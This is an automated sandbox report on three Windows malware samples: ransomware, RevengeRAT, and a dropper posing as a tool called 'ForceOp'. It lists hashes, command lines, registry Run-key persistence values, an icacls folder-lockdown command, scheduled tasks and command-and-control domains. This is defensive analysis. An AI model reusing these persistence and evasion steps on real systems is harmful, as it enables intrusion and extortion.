SHA512 63eb1e478568e65c79c648297de0eef31b27be5c562a15eb79e80852df74a57f6cde0573f736c602c18459bfd8d5ebb32f78d0acfd7682815b9cb257bbfa6caf

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 92f517fbd4dce9da55f8887d1c3f89f9
SHA1 6d334b58c1eb8daacfed7c8b9162d2cbd5725475
SHA256 236ab7fdd7cf879ccdbf0ed69c7a5a4e7fbc8cd8505fc652c54dee18e00151cb
SHA512 a0ff472cbca9c66897add3bb210e27e14478f77ce10117da196db673e15d1b9d4ae73e43b5c83bf89dad65a3fb9ea9463cd2c09fcad084f3d236c3c0159f3bbc

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 8ccf9428641d1092a9ee51338b7af45d
SHA1 b1fe71f9520fc6dda7c78eb09266021e496e0258
SHA256 2232e8c1e0292f2ea3cf427a3fa4f29544a1dd30ac77302dbc532e3295ec0461
SHA512 78abb5a609fa210ea0bd80d3f7e0a214ef554c9f0b175f0dc5b80d16ddeb8a63dd96049338c0df84f5b20bd2f328b4425cb45bfc8bfbfcc5d6a0dd86d609101b

C:\Users\Admin\AppData\Local\Temp\tmp.txt

MD5 608ec6edd52248c7c587394445d41a6e
SHA1 7f74abec809f7ac6761f80dddf376948092d81ae
SHA256 588e05409a97c7231902a73d67d59af9c41ac0d2e2a15285e3bfad0e56750686
SHA512 365b547d7fc2116d2f2bd4af1151f4c34f3903291983808ab93ee0e82d4e58fb96876d0887fbe9896a78008646dbf7fe23cfe02463a5df7462cb7e8a1a8c96f8

Analysis: behavioral10

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:15

Platform

win10v2004-20250502-en

Max time kernel

150s

Max time network

116s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe"

Signatures

Renames multiple (144) files with added filename extension

ransomware

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3299287909-2279959458-198972791-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3299287909-2279959458-198972791-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\e12d5353-769e-4b8e-a6cd-893dd680b5c5\\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\3D Objects\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
File opened for modification C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3568 wrote to memory of 3688 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Windows\SysWOW64\icacls.exe
PID 3568 wrote to memory of 3688 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Windows\SysWOW64\icacls.exe
PID 3568 wrote to memory of 3688 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Windows\SysWOW64\icacls.exe
PID 3568 wrote to memory of 5496 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 3568 wrote to memory of 5496 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 3568 wrote to memory of 5496 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 5496 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 5496 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 5496 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 5496 wrote to memory of 4724 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 5496 wrote to memory of 4724 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 5496 wrote to memory of 4724 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 4780 wrote to memory of 6060 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 4780 wrote to memory of 6060 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe
PID 4780 wrote to memory of 6060 N/A C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe

Processes

C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe

"C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe"

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\e12d5353-769e-4b8e-a6cd-893dd680b5c5" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe

"C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3568 -ip 3568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 2152

C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe

"C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe" --ForNetRes "FsnDCf1u1wJvLcqbFxxtOchBf2V2lgtk24oM5mt2" 0h7mFQcjRC3pDgsRcrWZ7K7bdAgvgDos224DmXt1 IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe

"C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe" --Service 5496 "FsnDCf1u1wJvLcqbFxxtOchBf2V2lgtk24oM5mt2" 0h7mFQcjRC3pDgsRcrWZ7K7bdAgvgDos224DmXt1

C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe

"C:\Users\Admin\AppData\Local\Temp\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe" --Service 4780 "FsnDCf1u1wJvLcqbFxxtOchBf2V2lgtk24oM5mt2" 0h7mFQcjRC3pDgsRcrWZ7K7bdAgvgDos224DmXt1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6060 -ip 6060

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6060 -s 1272

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4780 -ip 4780

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4780 -s 1656

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.2ip.ua udp
US 104.21.80.1:443 api.2ip.ua tcp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp
US 104.21.80.1:443 api.2ip.ua tcp
US 8.8.8.8:53 loot.ug udp
US 8.8.8.8:53 ymad.ug udp
US 8.8.8.8:53 loot.ug udp
US 8.8.8.8:53 loot.ug udp
US 8.8.8.8:53 loot.ug udp
US 104.21.80.1:443 api.2ip.ua tcp
US 104.21.80.1:443 api.2ip.ua tcp
US 104.21.80.1:443 api.2ip.ua tcp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp

Files

C:\Users\Admin\AppData\Local\e12d5353-769e-4b8e-a6cd-893dd680b5c5\5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe

MD5 ead18f3a909685922d7213714ea9a183
SHA1 1270bd7fd62acc00447b30f066bb23f4745869bf
SHA256 5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18
SHA512 6e532d9c3d186e4dac38823ae9152056346e283613f0caf088b21a1b3e5f4f6cf3bad8c407168b1072895a386e3be0b8c11ad1cb326d3d3ff0eb8562052def91

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

MD5 1fbb37f79b317a9a248e7c4ce4f5bac5
SHA1 0ff4d709ebf17be0c28e66dc8bf74672ca28362a
SHA256 6fb1b8e593cb0388f67ead35313a230f524657317ea86271b3a97362e5ec6ad9
SHA512 287e1d62c9ceb660965c266f677c467fbb997c2f5dcd1d63e185e266488aafc3489ac1d3feec81d10f01ce4a72e61a8bc4e124f137ce8675a220aa7797002e74

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

MD5 e3c54743de3ae30eaf044c2c5be4932b
SHA1 19b5f69413c4034de3ab22ffb0f805db08a6e31b
SHA256 2989e8252d64285fa888b7d4f569afc4c9fce47ab29652170be7d18f5c64dbc9
SHA512 8b471dee61c22790b1622c6f6855db528d3d6e510ed4f4a25eddb1ec79b939930695fc2e24eafe067299d87e822ad2a03dd4eb9db4da45e1640253a91c95add0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

MD5 4a90329071ae30b759d279cca342b0a6
SHA1 0ac7c4f3357ce87f37a3a112d6878051c875eda5
SHA256 fb6a7c3edcd7b97fabc18855102a39fc4d6d3f82c0fdd39b1667807b71b9c49b
SHA512 f0e206053d4369437c2c0f1f90f0fd03d631e4b9859d807049b41efde823d64cf4d75c28316d932360f7c03bd409e923c8bc2d4f5959361feacecfcf101ae823

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

MD5 bcd20826432b1e189267e8aca53178f4
SHA1 8465066594f18688c4b219ceb530a221184740b2
SHA256 232a4a7d117d269007992163c97be3e4729194b4c10accb913c40e5de1a6377f
SHA512 99b287359bff2d2d5bb9dad42c944cc83a40aec7c34bf57cc077baee5559ad6b0b08134a1167d4bd9a0fafc2f4c7e713035265790e255c45eaab98e74b0907b2

C:\ProgramData\_readme.txt

MD5 d75064cfaac9c92f52aadf373dc7e463
SHA1 36ea05181d9b037694929ec81f276f13c7d2655c
SHA256 163ec5b903b6baadd32d560c44c1ea4dce241579a7493eb32c632eae9085d508
SHA512 43387299749f31c623c5dd4a53ff4d2eff5edfeb80fd4e2edd45860b5c9367d2767ae2ee9b60824b57301999dd2bd995b7d3bd5e7187e447aed76106272559d1

C:\ProgramData\Microsoft\Network\Downloader\edbtmp.log

MD5 f782b09fd215d3d9bb898d61ea2e7a37
SHA1 a382348e9592bdf93dd10c49773b815a992fa7c7
SHA256 7bd4646090dff9875e08ea00e5727b11be19fcb850344856e66360c152835694
SHA512 9342bd7a0cbabd7e699ea545897a6403371a0034e4bea067a9662dad9e492c5fa9b27efa4c850e1c001c79d6a76ffe0dacb6831010e41c8d5e2a92bd5b898606

C:\ProgramData\Package Cache\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}v48.108.8828\dotnet-host-6.0.27-win-x64.msi

MD5 c3c0fe1bf5f38a6c89cead208307b99c
SHA1 df5d4f184c3124d4749c778084f35a2c00066b0b
SHA256 f4f6d008e54b5a6bac3998fc3fe8e632c347d6b598813e3524d5489b84bd2eaf
SHA512 0f3e96d16c512e37025b04ff7989d60126c3d65fe868dbcfbeae4dac910ce04fc52d1089f0e41ce85c2def0182a927fdcc349094e74cdd21b45a42fde7f01806

C:\ProgramData\Package Cache\{662A0088-6FCD-45DD-9EA7-68674058AED5}v14.30.30704\packages\vcRuntimeMinimum_amd64\vc_runtimeMinimum_x64.msi

MD5 b2e47100abd58190e40c8b6f9f672a36
SHA1 a754a78021b16e63d9e606cacc6de4fcf6872628
SHA256 889217bcb971387bc3cb6d76554646d2b0822eceb102320d40adf2422c829128
SHA512 d30da8c901e063df5901d011b22a01f884234ddddd44b9e81b3c43d93a51e10342074523339d155d69ff03a03a1df66c7d19e0137a16f47735b5b600616ca2a9

Analysis: behavioral14

Detonation Overview

Submitted 2025-05-04 05:10
Reported 2025-05-04 05:15
Platform win10v2004-20250502-en
Max time kernel 130s
Max time network 153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\948340be97cc69c2cf8e5c8327ee52a89eeb50095f978696c710ad773a46b654.exe"

Signatures

RevengeRAT

trojan revengerat

Revengerat family

revengerat

RevengeRat Executable

stealer
Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\948340be97cc69c2cf8e5c8327ee52a89eeb50095f978696c710ad773a46b654.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Client.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2930597513-779029253-718817275-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Client = "C:\\Users\\Admin\\AppData\\Roaming\\Client.exe" C:\Users\Admin\AppData\Roaming\Client.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\948340be97cc69c2cf8e5c8327ee52a89eeb50095f978696c710ad773a46b654.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Client.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Client.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\948340be97cc69c2cf8e5c8327ee52a89eeb50095f978696c710ad773a46b654.exe

"C:\Users\Admin\AppData\Local\Temp\948340be97cc69c2cf8e5c8327ee52a89eeb50095f978696c710ad773a46b654.exe"

C:\Users\Admin\AppData\Roaming\Client.exe

"C:\Users\Admin\AppData\Roaming\Client.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Client.exe

C:\Users\Admin\AppData\Roaming\Client.exe

C:\Users\Admin\AppData\Roaming\Client.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 cocohack.dtdns.net udp
US 3.33.243.145:84 cocohack.dtdns.net tcp
US 3.33.243.145:84 cocohack.dtdns.net tcp
US 3.33.243.145:84 cocohack.dtdns.net tcp
US 3.33.243.145:84 cocohack.dtdns.net tcp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp
US 3.33.243.145:84 cocohack.dtdns.net tcp
US 3.33.243.145:84 cocohack.dtdns.net tcp
US 3.33.243.145:84 cocohack.dtdns.net tcp

Files

C:\Users\Admin\AppData\Roaming\Client.exe

MD5 aa0a434f00c138ef445bf89493a6d731
SHA1 2e798c079b179b736247cf20d1346657db9632c7
SHA256 948340be97cc69c2cf8e5c8327ee52a89eeb50095f978696c710ad773a46b654
SHA512 e5b50ccd82c9cd5797dfc278dbd4bef6b4cb4468424962666d2618707a3c69e0154e8fb11846e0f529dd6e903fd9de2a2f4dd3b526821b10f08530371a0c6952

Analysis: behavioral19

Detonation Overview

Submitted 2025-05-04 05:10
Reported 2025-05-04 05:15
Platform win10v2004-20250502-en
Max time kernel 100s
Max time network 116s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\intofont\wincommon.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\es-ES\unsecapp.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Internet Explorer\es-ES\unsecapp.exe C:\intofont\wincommon.exe N/A
File created C:\Program Files (x86)\Internet Explorer\es-ES\29c1c3cc0f76855c7e7456076a4ffc27e4947119 C:\intofont\wincommon.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\intofont\wincommon.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\es-ES\unsecapp.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\intofont\wincommon.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Internet Explorer\es-ES\unsecapp.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 208 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe C:\Windows\SysWOW64\WScript.exe
PID 208 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe C:\Windows\SysWOW64\WScript.exe
PID 208 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe C:\Windows\SysWOW64\WScript.exe
PID 208 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe C:\Windows\SysWOW64\WScript.exe
PID 208 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe C:\Windows\SysWOW64\WScript.exe
PID 208 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe C:\Windows\SysWOW64\WScript.exe
PID 2060 wrote to memory of 5568 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2060 wrote to memory of 5568 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2060 wrote to memory of 5568 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
